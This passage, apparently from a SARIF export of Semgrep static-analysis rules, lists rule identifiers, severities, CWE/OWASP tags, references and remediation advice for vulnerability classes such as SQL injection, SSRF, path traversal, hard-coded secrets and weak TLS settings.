Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)\n","text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","id":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","name":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"help":{"markdown":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0)\n - [https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html](https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html)\n","text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","id":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","name":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","id":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","name":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"help":{"markdown":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n","text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"helpUri":"https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","id":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","name":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","properties":{"precision":"very-high","tags":["CWE-35: Path Traversal","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url","id":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","name":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-url.pg-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"help":{"markdown":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version)\n - [https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version](https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version)\n","text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","id":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","name":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","id":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","name":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Function sweepToken is allowed to be called by anyone"},"help":{"markdown":"Function sweepToken is allowed to be called by anyone\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted)\n - [https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2](https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2)\n - [https://chainsecurity.com/security-audit/compound-ctoken/](https://chainsecurity.com/security-audit/compound-ctoken/)\n - [https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/](https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/)\n - [https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f](https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f)\n","text":"Function sweepToken is allowed to be called by anyone"},"helpUri":"https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","id":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","name":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath","id":"java.spring.xpath.tainted-xpath.tainted-xpath","name":"java.spring.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","id":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","name":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","id":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","name":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"You should probably use Filename.get_temp_dirname()."},"help":{"markdown":"You should probably use Filename.get_temp_dirname().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string)\n","text":"You should probably use Filename.get_temp_dirname()."},"helpUri":"https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string","id":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","name":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: ocaml.lang.portability.slash-tmp.not-portable-tmp-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","id":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","name":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"help":{"markdown":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n - [https://nginx.org/en/docs/http/ngx_http_core_module.html#internal](https://nginx.org/en/docs/http/ngx_http_core_module.html#internal)\n","text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal","id":"generic.nginx.security.missing-internal.missing-internal","name":"generic.nginx.security.missing-internal.missing-internal","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.missing-internal.missing-internal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"help":{"markdown":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation)\n - [https://www.oracle.com/java/technologies/javase/tlsreadme.html](https://www.oracle.com/java/technologies/javase/tlsreadme.html)\n","text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","id":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","name":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"help":{"markdown":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection)\n - [https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security](https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security)\n","text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"helpUri":"https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","id":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","name":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","id":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","name":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context)\n - 